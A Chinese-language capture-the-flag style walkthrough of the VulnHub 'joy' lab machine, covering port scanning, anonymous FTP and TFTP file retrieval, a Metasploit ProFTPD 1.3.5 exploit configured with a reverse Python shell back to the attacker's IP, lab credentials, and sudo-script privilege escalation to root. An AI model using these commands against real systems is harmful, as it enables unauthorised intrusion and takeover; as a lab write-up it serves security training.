joy靶场

admin 2024年10月15日18:00:38评论25 views字数 1438阅读4分47秒阅读模式

OSCP--joy

声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者和此公众号不为此承担任何责任。

一、启动靶场

https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

joy靶场

joy靶场

启动完成

二、靶场渗透

首先扫主机与端口

nmap -sn 192.168.126.0/24    

joy靶场

nmap -p- -sV -sC -Pn 192.168.126.137

joy靶场

开始攻击

ftp已经检测出来了可以匿名登录

joy靶场

登录ftp的指令    

ftp 192.168.126.137

anonymous

anonymous

get directory

joy靶场

joy靶场

查看我们下载下来的文件,发现了一个version_control文件,里面可能会有服务的版本号等有用的重要信息

cat directory    

joy靶场

那么我们在看一下udp协议有么有我们用的服务

nmap -sU -sV -A --top-port 20 192.168.126.137

joy靶场

发现一个tftp的服务端口是36969

joy靶场

我们可以使用tftp来下载我们刚刚看到的文件version_control

指令:

tftp 192.168.126.137

get version_control

发现了version_control文件里面有一个pproftpd 1.3.5 这个服务,是由漏洞可以拿到shell的,我们使用msfconsole来进行攻击    

joy靶场

我们首先使用kali打开msfconsole工具,之后在使用search 来搜索proftpd 1.3.5 版本的攻击模块

指令:

msfconsole

search proftpd 1.3.5

use 0

joy靶场

joy靶场

joy靶场    

接下来做好设置我们就可以进行攻击了          
指令:

set RHOSTS 192.168.126.137(要攻击的主机ip)

set payload cmd/unix/reverse_python

set LHOSTS 192.168.126.128(自己的ip)

set SITEPATH /var/www/tryingharderisjoy

joy靶场

进行攻击,之后交互shell

指令:

run

shell

joy靶场

之后看一下当下文件,发现了一个oss的文件夹,之后进入,又发现一个patricksecretsofjoy文件,cat一下之后发现了patrick的账号密码root的被加密了    

credentials for JOY:

patrick:apollo098765

root:howtheheckdoiknowwhattherootpasswordis

how would these hack3rs ever find such a page?

joy靶场

切换到patrick用户,看看是否有sudo -l的权限,上一个账号是没有的,补充一下

joy靶场

joy靶场

/home/patrick/script/test

有一个文件具备sudo的权限

joy靶场

我这个是之前做过所以直接就能获得root权限,但是正常的靶场是没有权限的,之后我们使用sudo /home/patrick/script/test    

之后会让我们试着增加权限,第一此输入使用个回车,第二次输入777这样这个文件就具备了777的权限,之后在往test文件里面写入/bin/bash(指令:echo “/bin/bash” >/home/patrick/script/test),这样在执行sudo/home/patrick/script/test 就可以成功提权了

原文始发于微信公众号(攻防学堂):joy靶场

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月15日18:00:38
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   joy靶场https://cn-sec.com/archives/3271757.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息